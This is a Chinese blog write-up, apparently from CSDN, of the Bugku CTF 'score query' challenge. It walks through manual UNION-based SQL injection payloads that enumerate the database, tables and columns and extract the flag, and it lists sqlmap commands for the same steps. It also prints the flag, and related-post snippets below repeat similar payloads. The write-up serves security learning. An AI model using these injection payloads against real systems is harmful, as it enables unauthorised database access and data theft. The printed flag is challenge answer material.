bugku 成绩单 总结

CTF成绩查询SQL注入解题方法
最新推荐文章于 2022-11-06 15:22:00 发布
原创 最新推荐文章于 2022-11-06 15:22:00 发布 · 3k 阅读 · 3 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#CTF #SQLMap #SQL注入

博客围绕CTF成绩查询试题,介绍了两种解题方法。常规方法通过遍历、爆破,利用SQL语句获取数据库名、表名、字段名及数据;还介绍了用SQLMap进行查询测试,包括抓包保存,执行系列命令判断注入漏洞、查询数据库、表、列及内容。

试题地址:

http://40.125.170.89:49164/index.php

成绩查询





 

 

龙龙龙的成绩单
MathEnglishChinese
606070

方法一:常规方法

进入这道题目 我们先手遍历一遍 id=-1' union select 1,2,3,4#

发现有四个表且都有回显

于是 就开始爆破吧

通过id=-1' union select 1,2,3,database()#得到数据库名字skctf_flag

之后通过 id=-1' union select 1,2,3,group_concat(table_name) from information_schema.tables where table_schema=database()# 得到表名fl4g,sc

很显然我们需要的数据在fl4g这个表里

接下来我们就要暴字段了

通过id=-1' union select 1,2,3,group_concat(column_name) from information_schema.columns where table_name=0x666c3467#

得到字段skctf_flag

最后我们就可以开始查询数据了

通过id=-1' union select 1,2,3,skctf_flag from fl4g#

得到BUGKU{Sql_INJECT0N_4813drd8hz4}

 

方法二:SQLMap进行查询测试

1.用Burp抓包,然后保存抓取到的内容。例如:保存为post.txt,然后把它放至某个目录下

 

2.依次执行如下命令,得到最终的结果:

sqlmap.py -r C:\Users\ICBC\Desktop\post.txt                                                            //判断是否存在SQL注入漏洞
sqlmap.py -r C:\Users\ICBC\Desktop\post.txt --current-db                                            //查询当前数据库
sqlmap.py -r C:\Users\ICBC\Desktop\post.txt -D skctf --tables                                        //查询**数据库有哪些数据表
sqlmap.py -r C:\Users\ICBC\Desktop\post.txt -D skctf -T fl4g --columns                                //查询**数据库**数据表有哪些列
sqlmap.py -r C:\Users\ICBC\Desktop\post.txt -D skctf -T fl4g C skctf_flag --dump                    //查询**数据库**数据表**列的内容

SQL注入最最最基础(bugku成绩单
qq_51439282的博客
12-07 1654
SQL注入 今天在b站看了sql注入基础的视频(up主:小学生Tony君的第1天–sql注入,如何一步一步获取数据),醍醐灌顶,来此记录一下心得体会。这里我们会拿BUGKU成绩单这一题作为例题来讲解。 题目链接:http://123.206.87.240:8002/chengjidan/ SQL注入简介 Sql 注入攻击是通过将恶意的 Sql 查询或添加语句插入到应用的输入参数中,再在后台 Sql 服务器上解析执行进行的攻击,它目前黑客对数据库进行攻击的最常用手段之一。 SQL注入原理 这里拿构造id=1
bugku 成绩查询sql
qq_63875498的博客
12-04 984
bugku 成绩查询sql
bugku---成绩单
LuckySec
11-16 582
题目 http://123.206.87.240:8002/chengjidan/index.php 使用sqlmap进行注入 首先输入检测是否有注入点 python E:\Python27\sqlmap\sqlmapproject-sqlmap-6d48df2\sqlmap.py -u “http://123.206.87.240:8002/chengjidan/index.php” --d...
bugku成绩单
qq_51283187的博客
08-13 244
bugku成绩单 今天重温经典做了一遍这个题 哎,SQL注入好多细节都忘了该补补课了。 1 sql注入的时候order by 一定要看好10000000是不是也可以 刚刚做题的时候1" order by 10000000000# 这样都行,就很离谱,起不到想知道有多少列的效果了 2 这个时候我们再换用 1’ order by 4 # ok 1’ order by 5 # error 这样就知道只有’在这里才生效 3 对了还要注意前一个为-1,留出位置。好久不复习了,都要忘了 4 并且还要注意噢, -1 un
BugKu成绩单
Tle_Camouflage的博客
08-23 1544
成绩单(Web) 输入1并进行抓包。 然后按右键,点击copy to file保存文件,这里我保存到了C盘 333.txt。 然后打开sqlmap开始爆库:sqlmap.py -r “C:\333.txt” -p id –current-db -r –> 加载一个文件 -p –>指定参数 –current-db –>获取当前数据库名称(current前有...
bugku--成绩查询
hxhabcd123的博客
08-28 1940
该题记录暴力破解依次破解数据库名、表名、字段名、字段内容的解题过程,以及采用sqlmap工具解题
一次简单的sql注入 bugku 成绩查询
jzw0831的博客
11-06 1238
一次简单的sql注入 bugku 成绩查询
bugku成绩单writeup(手动注入sqlmap注入、python盲注详解)
渗透、攻防、CTF、编程
07-01 989
知识点:SQL注入,三种解法手动注入sqlmap注入、python盲注 一、手动注入 手动注入前先理解msysql的系统配置 select 1,database(),version();//查询数据库类型和版本 select * from information_schema.schemata //数据库下的所有库 schema_name='mysql' information_schema信息数据库。其中保存着关于MySQL服务器所维护的所有其他数据库的信息,SCHEMATA表:提供了当
Bugku成绩查询:一次简单的SQL注入过程
xhxtalent的博客
10-20 627
1很重要,一般来说在数据库中id不会有等于负数的,所以union联合查找前面部分的是错误的,故就是显示后面的查询内容,不然不会显示后面的查询内容的。一共查询到两个表名,分别是fl4g和sc表,我们需要但是flag,很大概率在fl4g表中,所以优先查询fl4g表的内容。查询到字段名为“skctf_flag”,那么就直接查询该字段的数据就能得到想要的了。and 1=2返回错误了,说明存在注入点的。递增上去,如果页面如果出现了错误,那么字段数就是当前的数字减1。分别输入1,2,3返回的是不同人名的成绩单
bugku 成绩单详解
qq_35811830的博客
01-26 1362
bugku 成绩单详解 首先打开查询成绩的页面 在火狐浏览器下使用hackbar插件对页面进行post请求,分别依次输入id=1,2,3,4 当你这样去试了之后,就会发现当输入id=1,2,3,的时候分别有三个孩子的成绩,但是当id=4的时候,成绩单里面的成绩又为空了。 因此我们可以猜测数据库里面一共是有四列的 然后在此处利用内置函数database()爆破获取数据库的名字。 至于为什么使用u...
bugku 成绩查询
m0_51504576的博客
04-21 678
最近刚好在了解sql注入的一些知识,然后刚好刷到了这题,记录一下我的思路吧~ 看到题目页面一个输入框就觉得是和sql注入有关的题目了,首先查看网页源代码: 看到name=id,在火狐浏览器用maxhackerbar打开传递参数试试: 成功查到了成绩单,并且切换1,2,3都可以成功,再判断是字符型注入还是数值型注入: id=1成功查询,id=1’查询失败,id=1’#查询成功,所以该注入类型为字符型注入。 简单说明一下为什么: 如果是数值型注入:where id =1 成功 where id=1’失败 w
bugku 成绩单
weixin_46578840的博客
07-24 131
打开网站抓包,直接开整 -1’ union select 1,2,3,4 – //四列 -1’ union select 1,2,3,database() – //得出数据库 -1’ union select 1,2,3,(select group_concat(table_name) from information_schema.tables wheretable_schema=‘skctf’) – //得出表 id=-94’ union select 1,2,3,(select group_conca
BugKu——成绩单
D-R0s1的博客
10-08 981
  sql注入CTF类竞赛中占着很大的比重,在做BugKu的题目的过程中恰好遇到了一个没有任何过滤,直接注入的题目,因为没有过滤,只是单纯的考察sql注入,所以步骤比较固定,语句也比较简单 1.首先,爆列数 1’ order by 4# 1’ order by 5#按照提示分别输入1,2,3都有回显,然后遍历一遍-1’ union select 1,2,3,4# 目录四个表都有回显 2.暴库...
成绩单bugku--web)
小白的劝退之路
04-29 511
解法一:手工注入 输入1,2,3分别能查到1,2,3号学生的成绩 SQL注入应该没跑了 输入1’返回异常,输入1’–+返回异常,输入1’ #或者1’-- +返回正常,看来过滤了–+ 观察,表貌似有四列(名字,Math,English,Chinese),输入1’ order by 4#返回正常,输入1’ order by 5#返回异常,看来的确是4列 接下来就开始暴库名、表名、字段名 尝试联合查询,...
Bugku--学生成绩查询
Golderant的博客
01-17 3125
首先测试正常数据。 尝试在正常数据后加上单引号,发现数据为空,加个注释符发现依旧可以正常输出。 尝试获取列数,因为已经输出名字和3科分数,所以就猜4和5,得知查询结果中有4列。 尝试直接联合查询,这里要记得把前面查询为空。== 根据数据库去查表名 找到fl4g表,下一步,找列名 最后一步,知道表名知道列名啦,去获取数据吧~~ 关于这个题呢,因为表fl
Bugku成绩单
Newbiek的博客
04-02 1000
首先,正常输入测试: Burp发现其为post包,只有1到3可以进行查询: 加单引号测试发现,这是一个注入点: 猜测注入的类型,发现and 1=1没有变化,但是1=2也没有变化: 不是数字型注入就试试字符型注入: 下一步就到了测试页面回显的地方的时候了,因为已经可以发现页面上有变动的地方为成绩单前面的位置、三科成绩的分数所以判断一下是不是有4列到5列(可能还有隐藏的东西): 确认了回显...
Bugku web 成绩单
S123KO的博客
08-24 367
本题直接在页面中的查询栏输入: 1' order by 4# (求出列数4列) 1' and 1=2 union select 1,2,3,4# (求显示位) 1'and 1=2 union select 1,2,database(),4# (求出数据库skctf_flag) 1'and 1=2 union select 1,2,3,group_concat(table_name)from...
BugkuCTF Web】成绩单
_Kisaragi_的博客
07-17 383
题目描述: 进入题目页面: 随便输入一点东西看看,输入1: 输入2: 初步判断这是一个查询系统,应该和SQL注入有关。 先看看回显字段个数,假设有4个回显字段,在查询框中输入语句: 1' order by 4# 正常回显: 将4改成5,再试试: 1' order by 5# 回显消失了,说明回显字段的个数是4个。 下面获取回显位置,构造语句: -1' union select 1, 2, 3, 4# 从图中我们可以得知,表格中回显的位置是2,3,4
Bugku学生成绩查询
qq_44813849的博客
03-19 2244
打开网站之后进入界面输入1,2,3分别能查到1,2,3号学生的成绩,其余便查询不到。猜测是sql注入
评论 1
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

johnlxj

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值